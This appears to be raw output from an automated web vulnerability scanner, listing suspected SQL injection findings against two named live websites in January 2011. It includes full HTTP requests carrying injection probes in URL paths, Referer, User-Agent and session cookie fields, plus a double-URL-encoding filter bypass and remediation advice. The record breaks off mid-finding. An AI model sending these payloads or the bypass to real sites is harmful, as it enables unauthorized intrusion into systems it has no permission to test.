HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:42:26 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3174 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news'%20and%201%3d1--%20/middleeast/2011/01/201113085252994161.html HTTP/1.1 Host: english.aljazeera.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Last-Modified: Sun, 30 Jan 2011 14:52:15 GMT Expires: Sun, 30 Jan 2011 14:52:15 GMT Date: Sun, 30 Jan 2011 14:52:15 GMT Server: Microsoft-IIS/6.0 Cache-Control: public, max-age=360 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=gegnmk55z3ufcfy344ht1a45; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 64156 X-Cache: MISS from 12.120.11.62 Via: 1.1 12.120.11.62:80 (cache/2.6.2.2.16.ATT) Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English </title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:51:59 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" /> <script src="/Scripts/SiteMenu.js" type="text/javascript"></script> <script src="/Scripts/Common.js" type="text/javascript"></script> <script src="/Scripts/SiteScripts.js" type="text/javascript"></script> <script src="/Scripts/ajax.js" type="text/javascript"></script> <script src="/Scripts/AddthisSettings.js" type="text/javascript"></script> <script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script> <script type="text/javascript" src="/AJEPlayer/swfobject.js"></script> <script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script> </head> <body class="MainBG" > <form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj ...[SNIP]...
Request 2
GET /news'%20and%201%3d2--%20/middleeast/2011/01/201113085252994161.html HTTP/1.1 Host: english.aljazeera.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2 (redirected)
HTTP/1.1 200 OK Last-Modified: Sun, 30 Jan 2011 14:51:59 GMT Date: Sun, 30 Jan 2011 14:51:59 GMT Server: Microsoft-IIS/6.0 Cache-Control: public, max-age=60 Content-Length: 174785 Content-Type: text/html Age: 16 X-Cache: HIT from 12.120.11.62 Via: 1.1 12.120.11.62:80 (cache/2.6.2.2.16.ATT) Connection: keep-alive
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news/middleeast'%20and%201%3d1--%20/2011/01/201113085252994161.html HTTP/1.1 Host: english.aljazeera.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Last-Modified: Sun, 30 Jan 2011 14:53:23 GMT Expires: Sun, 30 Jan 2011 14:53:23 GMT Date: Sun, 30 Jan 2011 14:53:23 GMT Server: Microsoft-IIS/6.0 Cache-Control: public, max-age=360 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=4mzuhv45dkuuyh45qjoteg55; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 64156 X-Cache: MISS from 12.120.11.62 Via: 1.1 12.120.11.62:80 (cache/2.6.2.2.16.ATT) Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English </title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:53:09 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" /> <script src="/Scripts/SiteMenu.js" type="text/javascript"></script> <script src="/Scripts/Common.js" type="text/javascript"></script> <script src="/Scripts/SiteScripts.js" type="text/javascript"></script> <script src="/Scripts/ajax.js" type="text/javascript"></script> <script src="/Scripts/AddthisSettings.js" type="text/javascript"></script> <script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script> <script type="text/javascript" src="/AJEPlayer/swfobject.js"></script> <script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script> </head> <body class="MainBG" > <form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj ...[SNIP]...
Request 2
GET /news/middleeast'%20and%201%3d2--%20/2011/01/201113085252994161.html HTTP/1.1 Host: english.aljazeera.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2 (redirected)
HTTP/1.1 200 OK Last-Modified: Sun, 30 Jan 2011 14:53:14 GMT Date: Sun, 30 Jan 2011 14:53:14 GMT Server: Microsoft-IIS/6.0 Cache-Control: public, max-age=60 Content-Length: 174785 Content-Type: text/html Age: 9 X-Cache: HIT from 12.120.11.61 Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT) Connection: keep-alive
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news/middleeast/2011'%20and%201%3d1--%20/01/201113085252994161.html HTTP/1.1 Host: english.aljazeera.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Last-Modified: Sun, 30 Jan 2011 14:54:23 GMT Expires: Sun, 30 Jan 2011 14:54:23 GMT Date: Sun, 30 Jan 2011 14:58:06 GMT Server: Microsoft-IIS/6.0 Cache-Control: public, max-age=360 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=zm2lsi45ohofqt55b5zofc25; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 64156 X-Cache: MISS from 12.120.11.61 Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT) Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English </title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:58:01 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" /> <script src="/Scripts/SiteMenu.js" type="text/javascript"></script> <script src="/Scripts/Common.js" type="text/javascript"></script> <script src="/Scripts/SiteScripts.js" type="text/javascript"></script> <script src="/Scripts/ajax.js" type="text/javascript"></script> <script src="/Scripts/AddthisSettings.js" type="text/javascript"></script> <script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script> <script type="text/javascript" src="/AJEPlayer/swfobject.js"></script> <script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script> </head> <body class="MainBG" > <form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj ...[SNIP]...
Request 2
GET /news/middleeast/2011'%20and%201%3d2--%20/01/201113085252994161.html HTTP/1.1 Host: english.aljazeera.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2 (redirected)
HTTP/1.1 200 OK Last-Modified: Sun, 30 Jan 2011 14:54:13 GMT Date: Sun, 30 Jan 2011 14:57:56 GMT Server: Microsoft-IIS/6.0 Cache-Control: public, max-age=60 Content-Length: 174785 Content-Type: text/html Age: 11 X-Cache: HIT from 12.120.11.63 Via: 1.1 12.120.11.63:80 (cache/2.6.2.2.16.ATT) Connection: keep-alive
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news/middleeast/2011/01'%20and%201%3d1--%20/201113085252994161.html HTTP/1.1 Host: english.aljazeera.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Last-Modified: Sun, 30 Jan 2011 14:55:14 GMT Expires: Sun, 30 Jan 2011 14:55:14 GMT Date: Sun, 30 Jan 2011 14:58:57 GMT Server: Microsoft-IIS/6.0 Cache-Control: public, max-age=360 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=xpdobtjno12jtunglmaon455; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 64156 X-Cache: MISS from 12.120.11.61 Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT) Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English </title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:58:50 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" /> <script src="/Scripts/SiteMenu.js" type="text/javascript"></script> <script src="/Scripts/Common.js" type="text/javascript"></script> <script src="/Scripts/SiteScripts.js" type="text/javascript"></script> <script src="/Scripts/ajax.js" type="text/javascript"></script> <script src="/Scripts/AddthisSettings.js" type="text/javascript"></script> <script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script> <script type="text/javascript" src="/AJEPlayer/swfobject.js"></script> <script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script> </head> <body class="MainBG" > <form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj ...[SNIP]...
Request 2
GET /news/middleeast/2011/01'%20and%201%3d2--%20/201113085252994161.html HTTP/1.1 Host: english.aljazeera.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2 (redirected)
HTTP/1.1 200 OK Last-Modified: Sun, 30 Jan 2011 14:55:13 GMT Date: Sun, 30 Jan 2011 14:58:56 GMT Server: Microsoft-IIS/6.0 Cache-Control: public, max-age=60 Content-Length: 174785 Content-Type: text/html Age: 2 X-Cache: HIT from 12.120.11.63 Via: 1.1 12.120.11.63:80 (cache/2.6.2.2.16.ATT) Connection: keep-alive
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /forums/topicsactive.aspx?forumid=-1 HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv; Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20
Response 1
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 73344 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:39:49 GMT; expires=Mon, 30-Jan-2012 15:39:49 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 15:59:49 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 15:39:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head><title> The Of ...[SNIP]... <a href="/members/abeaulieu.aspx" title="abeaulieu" class="online"> <img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="abeaulieu" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/abeaulieu.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" /> </a> </li>
GET /forums/topicsactive.aspx?forumid=-1 HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv; Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20
Response 2
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 73401 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:39:50 GMT; expires=Mon, 30-Jan-2012 15:39:50 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 15:59:50 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 15:39:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head><title> The Of ...[SNIP]... <a href="/members/Gaz3ll.aspx" title="Gaz3ll" class="online"> <img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="Gaz3ll" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/Gaz3ll.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" /> </a> </li>
The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the ASP.NET_SessionId cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /user/viewonline.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv';
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 104849 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:11:00 GMT; expires=Mon, 30-Jan-2012 16:11:00 GMT; path=/ Set-Cookie: ASP.NET_SessionId=se2isf55pdj1fz45lo4mp3no; path=/; HttpOnly Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:31:00 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 16:10:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head><title> Who's ...[SNIP]... <a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a> ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload 12539998'%20or%201%3d1--%20 was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /user/viewonline.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv; Referer: http://www.google.com/search?hl=en&q=12539998'%20or%201%3d1--%20
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 134518 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:13:12 GMT; expires=Mon, 30-Jan-2012 16:13:12 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:33:12 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 16:13:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head><title> Who's ...[SNIP]... <a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a> ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /user/viewonline.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response 1
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 126254 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:38 GMT; expires=Mon, 30-Jan-2012 16:12:38 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:32:38 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 16:12:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head><title> Who's ...[SNIP]... <a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a> ...[SNIP]...
Request 2
